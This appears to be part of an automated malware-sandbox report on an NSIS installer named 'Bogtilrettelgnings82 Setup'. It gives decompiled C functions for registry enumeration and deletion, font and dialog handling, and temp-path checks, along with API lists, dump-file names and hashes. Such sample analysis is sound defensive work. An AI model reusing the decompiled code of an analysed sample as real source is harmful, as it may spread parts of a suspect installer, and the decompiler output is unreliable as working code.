                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DeleteEnumOpen
                                                                      • String ID:
                                                                      • API String ID: 1912718029-0
                                                                      • Opcode ID: 4b25ae56376b3f1221da29a59a5e0d01808cbf612e92f5f00375b302b45f37be
                                                                      • Instruction ID: 6a9a95a3d1c289ebb6cdea9d4b31099183be5c714bdf59020cec6d7c6c818ba9
                                                                      • Opcode Fuzzy Hash: 4b25ae56376b3f1221da29a59a5e0d01808cbf612e92f5f00375b302b45f37be
                                                                      • Instruction Fuzzy Hash: 27114C71A00108FFDF21AF90DE49DAA3B7DEB54349F104136FA06B10A0DBB49E51AF69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00401CCC(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029FD(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                      0x00401cd6
                                                                      0x00401cdd
                                                                      0x00401d0c
                                                                      0x00401d14
                                                                      0x00401d1b
                                                                      0x00401d1b
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                      • GetDlgItem.USER32 ref: 00401CD0
                                                                      • GetClientRect.USER32 ref: 00401CDD
                                                                      • LoadImageA.USER32 ref: 00401CFE
                                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                                      • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: afc77c7f451b2242da1554e4e7d8ecbe8a3e94b7ffbccff52fd4b80020e54d7f
                                                                      • Instruction ID: f51ac8410cbf6ce335f498807c5bd2b5625ae864585cec2d5bc31dfd5d98a64c
                                                                      • Opcode Fuzzy Hash: afc77c7f451b2242da1554e4e7d8ecbe8a3e94b7ffbccff52fd4b80020e54d7f
                                                                      • Instruction Fuzzy Hash: 6DF012B2A05115BFE701EBA4EE89DAF77BCEB44301B109576F501F2191C7789D018B79
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401D26 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 71%
                                                                      			E00401D26() {
				void* __esi;
				int _t7;
				signed char _t13;
				struct HFONT__* _t16;
				void* _t20;
				struct HDC__* _t26;
				void* _t28;
				void* _t30;

				_t26 = GetDC( *(_t30 - 0x34));
				_t7 = GetDeviceCaps(_t26, 0x5a);
				0x40a7b8->lfHeight =  ~(MulDiv(E004029E0(2), _t7, 0x48));
				ReleaseDC( *(_t30 - 0x34), _t26);
				 *0x40a7c8 = E004029E0(3);
				_t13 =  *((intOrPtr*)(_t30 - 0x14));
				 *0x40a7cf = 1;
				 *0x40a7cc = _t13 & 0x00000001;
				 *0x40a7cd = _t13 & 0x00000002;
				 *0x40a7ce = _t13 & 0x00000004;
				E00405D00(_t20, _t26, _t28, 0x40a7d4,  *((intOrPtr*)(_t30 - 0x20)));
				_t16 = CreateFontIndirectA(0x40a7b8);
				_push(_t16);
				_push(_t28);
				E00405C3C();
				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                      0x00401d2f
                                                                      0x00401d36
                                                                      0x00401d51
                                                                      0x00401d56
                                                                      0x00401d63
                                                                      0x00401d68
                                                                      0x00401d73
                                                                      0x00401d7a
                                                                      0x00401d8c
                                                                      0x00401d92
                                                                      0x00401d97
                                                                      0x00401da1
                                                                      0x004024cb
                                                                      0x00401561
                                                                      0x0040283a
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401D29
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                                      • ReleaseDC.USER32 ref: 00401D56
                                                                      • CreateFontIndirectA.GDI32(0040A7B8), ref: 00401DA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID:
                                                                      • API String ID: 3808545654-0
                                                                      • Opcode ID: 6db521c7c502fe74efbec2512e91b531a8c8ce959b0fac9aafa0bb78a36e2a65
                                                                      • Instruction ID: 060246e538297e9e1c784849604c8f7f1088759f99002d8560b965ebc89bd25b
                                                                      • Opcode Fuzzy Hash: 6db521c7c502fe74efbec2512e91b531a8c8ce959b0fac9aafa0bb78a36e2a65
                                                                      • Instruction Fuzzy Hash: 43018671958340AFEB015BB0AE0EB9E3FB4EB15705F208439F141B72E2C57854159B2F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 51%
                                                                      			E00401BB8() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029E0(3);
				 *(_t55 + 8) = E004029E0(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029FD(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029FD(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029FD();
					_t28 = E004029FD();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029E0();
					_t37 = E004029E0();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405C3C();
				}
				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                      0x00401bc1
                                                                      0x00401bcd
                                                                      0x00401bd0
                                                                      0x00401bd9
                                                                      0x00401bd9
                                                                      0x00401bdc
                                                                      0x00401be0
                                                                      0x00401be9
                                                                      0x00401be9
                                                                      0x00401bec
                                                                      0x00401bf0
                                                                      0x00401bf2
                                                                      0x00401c3f
                                                                      0x00401c41
                                                                      0x00401c4a
                                                                      0x00401c52
                                                                      0x00401c55
                                                                      0x00401c55
                                                                      0x00401c5e
                                                                      0x00000000
                                                                      0x00401bf4
                                                                      0x00401bfb
                                                                      0x00401bfd
                                                                      0x00401c05
                                                                      0x00401c08
                                                                      0x00401c30
                                                                      0x00401c64
                                                                      0x00401c64
                                                                      0x00401c0a
                                                                      0x00401c18
                                                                      0x00401c20
                                                                      0x00401c23
                                                                      0x00401c23
                                                                      0x00401c08
                                                                      0x00401c67
                                                                      0x00401c6a
                                                                      0x00401c70
                                                                      0x0040283a
                                                                      0x0040283a
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
                                                                      • Instruction ID: aec06c1df61e239cd4f76122eecd213935ad84fca4bb147c4325ce067fac4872
                                                                      • Opcode Fuzzy Hash: 5bd36806d10e7675ce8922960c3dd847d1fc55b80fe462cbded294bcfffbeb76
                                                                      • Instruction Fuzzy Hash: B82190B1A44208BFEF41AFB4CE4AAAE7BB5EF40344F14453EF541B61D1D6B89A40D728
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040576E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040576E(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409014);
				}
				return _t7;
			}




                                                                      0x0040576f
                                                                      0x00405786
                                                                      0x0040578e
                                                                      0x0040578e
                                                                      0x00405796

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,746AFA90,004033C9), ref: 00405774
                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,746AFA90,004033C9), ref: 0040577D
                                                                      • lstrcatA.KERNEL32(?,00409014), ref: 0040578E
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040576E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-3936084776
                                                                      • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                      • Instruction ID: 1a6830d2c1c169c874c5ca2981f80c8a3f1a40f12e9be47e1b60bd4f3e9b1918
                                                                      • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                      • Instruction Fuzzy Hash: 9BD0A9A2609A306AE20222199C05E8F6A08CF02300B040032F605B62A2C63C0E429BFE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 85%
                                                                      			E00401EDC(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029FD(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409014, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405C3C(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405C3C(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                                                      0x00401ede
                                                                      0x00401ee6
                                                                      0x00401eeb
                                                                      0x00401ef0
                                                                      0x00401ef4
                                                                      0x00401ef7
                                                                      0x00401ef9
                                                                      0x00401f00
                                                                      0x00401f09
                                                                      0x00401f11
                                                                      0x00401f14
                                                                      0x00401f29
                                                                      0x00401f2f
                                                                      0x00401f42
                                                                      0x00401f4b
                                                                      0x00401f57
                                                                      0x00401f5c
                                                                      0x00401f5c
                                                                      0x00401f42
                                                                      0x00401f5f
                                                                      0x00401b80
                                                                      0x00401b80
                                                                      0x00401f14
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                                      • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                                        • Part of subcall function 00405C3C: wsprintfA.USER32 ref: 00405C49
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                      • String ID:
                                                                      • API String ID: 1404258612-0
                                                                      • Opcode ID: aa5a956563f94264f8986a84426553d578cf2b3af7288d740c55cc0e7e4e042a
                                                                      • Instruction ID: b3fcdbc9dd76458da788cdf58b6f95538f5ce151b2f15d12b0a955ad6fee60ce
                                                                      • Opcode Fuzzy Hash: aa5a956563f94264f8986a84426553d578cf2b3af7288d740c55cc0e7e4e042a
                                                                      • Instruction Fuzzy Hash: F31173B1900218BEDB01EFA5DD41D9EBBB9EF04344F10807AF505F61A1E7389E54DB28
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405807 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00405807(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405799(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}









                                                                      0x00405810
                                                                      0x00405817
                                                                      0x0040581a
                                                                      0x0040581c
                                                                      0x00405820
                                                                      0x00405835
                                                                      0x00405854
                                                                      0x00000000
                                                                      0x0040583c
                                                                      0x0040583e
                                                                      0x0040583f
                                                                      0x00405842
                                                                      0x00405843
                                                                      0x0040584b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040584d
                                                                      0x00405850
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405850
                                                                      0x00000000
                                                                      0x0040583f
                                                                      0x0040582d
                                                                      0x00000000
                                                                      0x0040582e

                                                                      APIs
                                                                      • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,?,00405873,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,?,?,746AF560,004055BE,?,C:\Users\user\AppData\Local\Temp\,746AF560,00000000), ref: 00405815
                                                                      • CharNextA.USER32(00000000), ref: 0040581A
                                                                      • CharNextA.USER32(00000000), ref: 0040582E
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp, xrefs: 00405808
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp
                                                                      • API String ID: 3213498283-3416995437
                                                                      • Opcode ID: 180c61c53d858fd4c5624aa8e60612970d78334aec32c9cd585625149e8e1fa8
                                                                      • Instruction ID: 7fee62fa1586e0402133b65fdba7f53f84a5380dec521f77411adb64ad0fd030
                                                                      • Opcode Fuzzy Hash: 180c61c53d858fd4c5624aa8e60612970d78334aec32c9cd585625149e8e1fa8
                                                                      • Instruction Fuzzy Hash: B7F0C253948F502AFF3272240C50B675B88CB55310F08807FEA806A2C2827C88648B9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040585C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 53%
                                                                      			E0040585C(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405CDE(0x4210e8, _a4);
				_t21 = E00405807(0x4210e8);
				if(_t21 != 0) {
					E00405F49(_t21);
					if(( *0x4236f8 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x4210e8;
						while(1) {
							_t11 = lstrlenA(0x4210e8);
							_push(0x4210e8);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405FE2();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E004057B5(0x4210e8);
								continue;
							} else {
								goto L1;
							}
						}
						E0040576E();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                      0x00405868
                                                                      0x00405873
                                                                      0x00405877
                                                                      0x0040587e
                                                                      0x0040588a
                                                                      0x00405896
                                                                      0x00405896
                                                                      0x004058ae
                                                                      0x004058af
                                                                      0x004058b6
                                                                      0x004058b7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040589a
                                                                      0x004058a1
                                                                      0x004058a9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004058a1
                                                                      0x004058b9
                                                                      0x00000000
                                                                      0x004058cd
                                                                      0x0040588c
                                                                      0x00405890
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405890
                                                                      0x00405879
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 00405CDE: lstrcpynA.KERNEL32(?,?,00000400,00403287,Bogtilrettelgnings82 Setup,NSIS Error), ref: 00405CEB
                                                                        • Part of subcall function 00405807: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,?,00405873,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,?,?,746AF560,004055BE,?,C:\Users\user\AppData\Local\Temp\,746AF560,00000000), ref: 00405815
                                                                        • Part of subcall function 00405807: CharNextA.USER32(00000000), ref: 0040581A
                                                                        • Part of subcall function 00405807: CharNextA.USER32(00000000), ref: 0040582E
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,?,?,746AF560,004055BE,?,C:\Users\user\AppData\Local\Temp\,746AF560,00000000), ref: 004058AF
                                                                      • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,?,?,746AF560,004055BE,?,C:\Users\user\AppData\Local\Temp\,746AF560), ref: 004058BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
